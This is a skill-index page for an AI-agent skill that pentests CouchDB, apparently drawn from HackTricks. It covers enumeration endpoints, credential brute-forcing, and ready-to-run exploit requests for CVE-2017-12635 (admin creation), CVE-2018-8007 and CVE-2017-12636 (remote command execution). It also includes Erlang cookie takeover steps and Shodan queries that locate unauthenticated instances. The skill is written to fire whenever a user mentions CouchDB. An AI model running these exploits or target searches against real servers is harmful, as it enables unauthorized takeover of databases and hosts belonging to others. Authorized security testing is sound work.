OpenSkillIndex← back to search

Hacktricks-skills couchdb-pentest

Pentest CouchDB databases on ports 5984/6984. Use this skill whenever the user mentions CouchDB, document databases, port 5984, port 6984, or needs to enumerate/exploit CouchDB instances. This includes database enumeration, credential testing, privilege escalation, and RCE exploitation.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/5984-pentesting-couchdb/SKILL.MD
source content

CouchDB Pentesting

A comprehensive skill for testing CouchDB document-oriented databases for security vulnerabilities.

Quick Start

# Basic enumeration
curl http://<IP>:5984/

# List all databases
curl http://<IP>:5984/_all_dbs

# With credentials
curl http://<user>:<password>@<IP>:5984/_all_dbs

Enumeration

Automatic Enumeration

Use these tools for initial reconnaissance:

# Nmap scripts
nmap -sV --script couchdb-databases,couchdb-stats -p 5984 <IP>

# Metasploit
msfconsole
use auxiliary/scanner/couchdb/couchdb_enum
set RHOSTS <IP>
run

Manual Enumeration

Banner Grabbing

curl http://<IP>:5984/

Expected responses:

  • {"couchdb":"Welcome","version":"0.10.1"}
    - Version info
  • {"error":"unauthorized","reason":"Authentication required."}
    - Auth required (401)

Information Endpoints

These endpoints reveal system information:

EndpointDescription
/_active_tasks
Running tasks with status and process IDs
/_all_dbs
List of all databases
/_cluster_setup
Cluster status and configuration
/_db_updates
Database events (requires 
_global_changes
)
/_membership
Cluster nodes information
/_scheduler/jobs
Replication jobs with source/target info
/_scheduler/docs
Replication document states
/_node/_local
Current Erlang node name
/_node/_local/_stats
Server statistics
/_node/_local/_system
System-level statistics
/_up
Server health check
/_uuids
Generate UUIDs
/_reshard
Resharding job status

Database Enumeration

# List all databases
curl -X GET http://<IP>:5984/_all_dbs

# Get database info
curl http://<IP>:5984/<database_name>

# List documents in database
curl -X GET http://<IP>:5984/<database_name>/_all_docs

# Read specific document
curl -X GET http://<IP>:5984/<database_name>/<document_id>

Authentication Testing

Credential Discovery

If you receive 401 Unauthorized responses, try:

  1. Brute force - Use common credentials or password lists
  2. Default credentials - Check for 
    admin:admin
    , 
    couchdb:couchdb
  3. Extract from configs - Look for credentials in backup files or configs

Using Credentials

# URL encoding
curl http://<user>:<password>@<IP>:5984/_all_dbs

# Or with -u flag
curl -u <user>:<password> http://<IP>:5984/_all_dbs

Privilege Escalation

CVE-2017-12635 - Admin User Creation

Exploit JSON parser differences to create admin users:

curl -X PUT \
  -d '{"type":"user","name":"<username>","roles":["_admin"],"roles":[],"password":"<password>"}' \
  http://<IP>:5984/_users/org.couchdb.user:<username> \
  -H "Content-Type:application/json"

Note: The duplicate 

roles
keys exploit parser differences between Erlang and JavaScript.

Remote Code Execution

CVE-2018-8007 - Configuration Injection

Requires write access to 

local.ini
file:

# Inject command via CORS configuration
curl -X PUT \
  'http://<user>:<password>@<IP>:5984/_node/couchdb@<IP>/_config/cors/origins' \
  -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  -d "<origin>\n\n[os_daemons]\ntestdaemon = /path/to/command"

# Restart CouchDB to trigger execution
kill <couchdb_process_id>

CVE-2017-12636 - Query Server Exploitation

Requires write access to 

local.ini
:

# Add custom query server
curl -X PUT \
  'http://<user>:<password>@<IP>:5984/_node/couchdb@<IP>/_config/query_servers/cmd' \
  -d '"/path/to/command"'

# Create database and design document
curl -X PUT 'http://<user>:<password>@<IP>:5984/<dbname>'
curl -X PUT 'http://<user>:<password>@<IP>:5984/<dbname>/_design/<viewname>' \
  -d '{"_id": "_design/<viewname>", "views": {"anything": {"map": ""} }, "language": "cmd"}'

# Trigger execution
curl http://<user>:<password>@<IP>:5984/<dbname>/_design/<viewname>/_view/anything

Erlang Cookie Exploitation

If port 4369 (EPMD) is accessible:

  1. Extract the Erlang cookie from the system
  2. Use it to connect to the Erlang node
  3. Execute arbitrary code via the Erlang shell

See the Erlang EPMD pentesting guide for detailed exploitation steps.

Shodan Queries

# Find CouchDB instances
port:5984 couchdb

# Find unauthenticated instances
port:5984 "Welcome"

# Find specific versions
port:5984 "version":"2.0.0"

Common Databases to Check

  • _users
    - User accounts
  • _replicator
    - Replication configurations
  • _global_changes
    - Change tracking
  • _metadata
    - Metadata storage

Safety Notes

  • Always test in authorized environments only
  • RCE exploits may crash the CouchDB service
  • Backup configurations before testing
  • Document all findings for remediation

References